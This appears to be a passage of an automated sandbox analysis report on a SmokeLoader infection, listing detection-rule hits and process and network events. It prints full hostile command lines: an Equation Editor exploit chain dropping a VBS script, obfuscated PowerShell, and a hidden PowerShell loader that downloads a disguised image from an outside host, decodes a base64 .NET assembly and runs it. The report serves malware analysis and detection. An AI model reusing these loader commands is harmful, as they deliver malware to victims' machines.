  • Source: 7.2.powershell.exe.2878da8.0.raw.unpack, Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Author: Joe Security
  • Source: 10.2.RegAsm.exe.400000.0.unpack, Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Author: Joe Security

Exploits

Source: Network Connection, Author: Joe Security, Data: DestinationIp: 23.94.148.16, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3312, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3312, TargetFilename: C:\Users\user\AppData\Roaming\verynicebuttersmoothcakeicream.vBs

System Summary

            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? 
?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ?
Source: Network Connection, Author: Max Altgelt (Nextron Systems), Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3312, Protocol: tcp, SourceIp: 23.94.148.16, SourceIsIpv6: false, SourcePort: 80
            Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VFEW/09/61.841.49.32//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = 
[System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VFEW/09/61.841.49.32//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? 
?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ?
Source: Process started, Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io, Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebuttersmoothcakeicream.vBs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebuttersmoothcakeicream.vBs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3312, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebuttersmoothcakeicream.vBs" , ProcessId: 3472, ProcessName: wscript.exe
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebuttersmoothcakeicream.vBs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebuttersmoothcakeicream.vBs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3312, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebuttersmoothcakeicream.vBs" , ProcessId: 3472, ProcessName: wscript.exe
            Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? 
?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ?
            Source: Process started | Author: Max Altgelt (Nextron Systems) | Data: Command: C:\Users\user\AppData\Roaming\gwseuha, CommandLine: C:\Users\user\AppData\Roaming\gwseuha, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\gwseuha, NewProcessName: C:\Users\user\AppData\Roaming\gwseuha, OriginalFileName: C:\Users\user\AppData\Roaming\gwseuha, ParentCommandLine: taskeng.exe {B5E7D6C9-0A45-4095-9C68-D1725C8390DE} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1], ParentImage: C:\Windows\System32\taskeng.exe, ParentProcessId: 3988, ParentProcessName: taskeng.exe, ProcessCommandLine: C:\Users\user\AppData\Roaming\gwseuha, ProcessId: 4020, ProcessName: gwseuha
            Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VFEW/09/61.841.49.32//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type 
= $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VFEW/09/61.841.49.32//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8
